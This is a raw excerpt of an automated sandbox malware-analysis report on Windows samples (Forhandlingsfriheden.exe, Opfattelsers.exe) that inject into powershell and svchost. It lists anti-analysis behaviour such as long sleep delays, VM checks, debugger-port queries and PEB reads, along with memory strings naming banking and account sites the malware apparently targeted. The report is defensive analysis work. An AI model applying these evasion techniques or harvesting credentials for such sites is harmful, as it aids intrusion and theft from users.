            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3484Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeAPI coverage: 0.2 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029CC660 FindFirstFileW,FindNextFileW,FindClose,9_2_029CC660
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 72945936.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 72945936.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 72945936.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: 72945936.9.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 72945936.9.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 72945936.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: Opfattelsers.exe, 00000006.00000002.3039878471.0000000003B41000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2935042588.0000000003B41000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2935165232.0000000003B41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 72945936.9.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 72945936.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 72945936.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 72945936.9.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 72945936.9.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: 72945936.9.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: PxuyeSuijNdsM.exe, 00000008.00000002.3360607525.0000000001430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3359998608.000000000300C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 72945936.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: Tvrvejen179.Maa.0.drBinary or memory string: ovmCI
            Source: 72945936.9.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 72945936.9.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 72945936.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 72945936.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: powershell.exe, 00000002.00000002.2795610607.0000000004EBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
            Source: 72945936.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 72945936.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000002.00000002.2795610607.0000000004EBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
            Source: 72945936.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 72945936.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 72945936.9.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 72945936.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: powershell.exe, 00000002.00000002.2795610607.0000000004EBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
            Source: 72945936.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 72945936.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 72945936.9.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 72945936.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 72945936.9.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 72945936.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 72945936.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 72945936.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8~
            Source: firefox.exe, 0000000B.00000002.3331314850.0000025672DBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFF
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeAPI call chain: ExitProcess graph end nodegraph_0-3714
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeAPI call chain: ExitProcess graph end nodegraph_0-3722
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DFE20 rdtsc 6_2_1F7DFE20
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06FE42F0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,2_2_06FE42F0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F843F90 mov eax, dword ptr fs:[00000030h]6_2_1F843F90
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F843F90 mov eax, dword ptr fs:[00000030h]6_2_1F843F90
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CBF60 mov eax, dword ptr fs:[00000030h]6_2_1F7CBF60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A1F50 mov eax, dword ptr fs:[00000030h]6_2_1F7A1F50
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D7F51 mov eax, dword ptr fs:[00000030h]6_2_1F7D7F51
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85BFC0 mov ecx, dword ptr fs:[00000030h]6_2_1F85BFC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85BFC0 mov eax, dword ptr fs:[00000030h]6_2_1F85BFC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F873FC0 mov eax, dword ptr fs:[00000030h]6_2_1F873FC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F823FD7 mov eax, dword ptr fs:[00000030h]6_2_1F823FD7
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBFEC mov eax, dword ptr fs:[00000030h]6_2_1F7DBFEC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBFEC mov eax, dword ptr fs:[00000030h]6_2_1F7DBFEC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBFEC mov eax, dword ptr fs:[00000030h]6_2_1F7DBFEC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F821F13 mov eax, dword ptr fs:[00000030h]6_2_1F821F13
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82DF10 mov eax, dword ptr fs:[00000030h]6_2_1F82DF10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79BFD0 mov eax, dword ptr fs:[00000030h]6_2_1F79BFD0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85DF2F mov eax, dword ptr fs:[00000030h]6_2_1F85DF2F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D1FCD mov eax, dword ptr fs:[00000030h]6_2_1F7D1FCD
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D1FCD mov eax, dword ptr fs:[00000030h]6_2_1F7D1FCD
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D1FCD mov eax, dword ptr fs:[00000030h]6_2_1F7D1FCD
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3FC2 mov eax, dword ptr fs:[00000030h]6_2_1F7A3FC2
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F847F3E mov eax, dword ptr fs:[00000030h]6_2_1F847F3E
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F81FF42 mov eax, dword ptr fs:[00000030h]6_2_1F81FF42
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E1FB8 mov eax, dword ptr fs:[00000030h]6_2_1F7E1FB8
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBFB0 mov eax, dword ptr fs:[00000030h]6_2_1F7DBFB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov eax, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov eax, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov eax, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov ecx, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F92 mov eax, dword ptr fs:[00000030h]6_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79FF90 mov edi, dword ptr fs:[00000030h]6_2_1F79FF90
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79BE78 mov ecx, dword ptr fs:[00000030h]6_2_1F79BE78
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82DE9B mov eax, dword ptr fs:[00000030h]6_2_1F82DE9B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82DEAA mov eax, dword ptr fs:[00000030h]6_2_1F82DEAA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBE51 mov eax, dword ptr fs:[00000030h]6_2_1F7DBE51
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBE51 mov eax, dword ptr fs:[00000030h]6_2_1F7DBE51
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84DEB0 mov eax, dword ptr fs:[00000030h]6_2_1F84DEB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84DEB0 mov ecx, dword ptr fs:[00000030h]6_2_1F84DEB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84DEB0 mov eax, dword ptr fs:[00000030h]6_2_1F84DEB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84DEB0 mov eax, dword ptr fs:[00000030h]6_2_1F84DEB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84DEB0 mov eax, dword ptr fs:[00000030h]6_2_1F84DEB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85DEB0 mov eax, dword ptr fs:[00000030h]6_2_1F85DEB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B5E40 mov eax, dword ptr fs:[00000030h]6_2_1F7B5E40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82FEC5 mov eax, dword ptr fs:[00000030h]6_2_1F82FEC5
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A1E30 mov eax, dword ptr fs:[00000030h]6_2_1F7A1E30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A1E30 mov eax, dword ptr fs:[00000030h]6_2_1F7A1E30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BDE2D mov eax, dword ptr fs:[00000030h]6_2_1F7BDE2D
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BDE2D mov eax, dword ptr fs:[00000030h]6_2_1F7BDE2D
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BDE2D mov eax, dword ptr fs:[00000030h]6_2_1F7BDE2D
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F859EDF mov eax, dword ptr fs:[00000030h]6_2_1F859EDF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F859EDF mov eax, dword ptr fs:[00000030h]6_2_1F859EDF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86BEE6 mov eax, dword ptr fs:[00000030h]6_2_1F86BEE6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86BEE6 mov eax, dword ptr fs:[00000030h]6_2_1F86BEE6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86BEE6 mov eax, dword ptr fs:[00000030h]6_2_1F86BEE6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86BEE6 mov eax, dword ptr fs:[00000030h]6_2_1F86BEE6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79DE10 mov eax, dword ptr fs:[00000030h]6_2_1F79DE10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBE17 mov eax, dword ptr fs:[00000030h]6_2_1F7DBE17
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3EF4 mov eax, dword ptr fs:[00000030h]6_2_1F7A3EF4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3EF4 mov eax, dword ptr fs:[00000030h]6_2_1F7A3EF4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3EF4 mov eax, dword ptr fs:[00000030h]6_2_1F7A3EF4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D3EEB mov ecx, dword ptr fs:[00000030h]6_2_1F7D3EEB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D3EEB mov eax, dword ptr fs:[00000030h]6_2_1F7D3EEB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D3EEB mov eax, dword ptr fs:[00000030h]6_2_1F7D3EEB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F873E10 mov eax, dword ptr fs:[00000030h]6_2_1F873E10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F873E10 mov eax, dword ptr fs:[00000030h]6_2_1F873E10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3EE1 mov eax, dword ptr fs:[00000030h]6_2_1F7A3EE1
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F875E37 mov eax, dword ptr fs:[00000030h]6_2_1F875E37
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F875E37 mov eax, dword ptr fs:[00000030h]6_2_1F875E37
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F875E37 mov eax, dword ptr fs:[00000030h]6_2_1F875E37
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79BEC0 mov eax, dword ptr fs:[00000030h]6_2_1F79BEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79BEC0 mov eax, dword ptr fs:[00000030h]6_2_1F79BEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7ABEC0 mov eax, dword ptr fs:[00000030h]6_2_1F7ABEC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85DE46 mov eax, dword ptr fs:[00000030h]6_2_1F85DE46
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F849E56 mov ecx, dword ptr fs:[00000030h]6_2_1F849E56
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79FEA0 mov eax, dword ptr fs:[00000030h]6_2_1F79FEA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79DEA5 mov eax, dword ptr fs:[00000030h]6_2_1F79DEA5
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79DEA5 mov ecx, dword ptr fs:[00000030h]6_2_1F79DEA5
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A7E96 mov eax, dword ptr fs:[00000030h]6_2_1F7A7E96
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D3E8F mov eax, dword ptr fs:[00000030h]6_2_1F7D3E8F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A7D75 mov eax, dword ptr fs:[00000030h]6_2_1F7A7D75
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A7D75 mov eax, dword ptr fs:[00000030h]6_2_1F7A7D75
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F835DA0 mov eax, dword ptr fs:[00000030h]6_2_1F835DA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F835DA0 mov eax, dword ptr fs:[00000030h]6_2_1F835DA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F835DA0 mov eax, dword ptr fs:[00000030h]6_2_1F835DA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F835DA0 mov ecx, dword ptr fs:[00000030h]6_2_1F835DA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBD4E mov eax, dword ptr fs:[00000030h]6_2_1F7DBD4E
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DBD4E mov eax, dword ptr fs:[00000030h]6_2_1F7DBD4E
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82DDB1 mov eax, dword ptr fs:[00000030h]6_2_1F82DDB1
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F797D41 mov eax, dword ptr fs:[00000030h]6_2_1F797D41
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov ecx, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D40 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86DDC6 mov eax, dword ptr fs:[00000030h]6_2_1F86DDC6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85DDC7 mov eax, dword ptr fs:[00000030h]6_2_1F85DDC7
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82DDC0 mov eax, dword ptr fs:[00000030h]6_2_1F82DDC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D20 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D20
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D00 mov eax, dword ptr fs:[00000030h]6_2_1F7B3D00
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82FD2A mov eax, dword ptr fs:[00000030h]6_2_1F82FD2A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82FD2A mov eax, dword ptr fs:[00000030h]6_2_1F82FD2A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3DD0 mov eax, dword ptr fs:[00000030h]6_2_1F7A3DD0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3DD0 mov eax, dword ptr fs:[00000030h]6_2_1F7A3DD0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82DD47 mov eax, dword ptr fs:[00000030h]6_2_1F82DD47
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BDDB1 mov eax, dword ptr fs:[00000030h]6_2_1F7BDDB1
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BDDB1 mov eax, dword ptr fs:[00000030h]6_2_1F7BDDB1
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BDDB1 mov eax, dword ptr fs:[00000030h]6_2_1F7BDDB1
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D9DAF mov eax, dword ptr fs:[00000030h]6_2_1F7D9DAF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7AFDA9 mov eax, dword ptr fs:[00000030h]6_2_1F7AFDA9
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F875D50 mov eax, dword ptr fs:[00000030h]6_2_1F875D50
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F875D50 mov eax, dword ptr fs:[00000030h]6_2_1F875D50
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F861D5A mov eax, dword ptr fs:[00000030h]6_2_1F861D5A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F861D5A mov eax, dword ptr fs:[00000030h]6_2_1F861D5A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F861D5A mov eax, dword ptr fs:[00000030h]6_2_1F861D5A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F861D5A mov eax, dword ptr fs:[00000030h]6_2_1F861D5A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F799D96 mov eax, dword ptr fs:[00000030h]6_2_1F799D96
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F799D96 mov eax, dword ptr fs:[00000030h]6_2_1F799D96
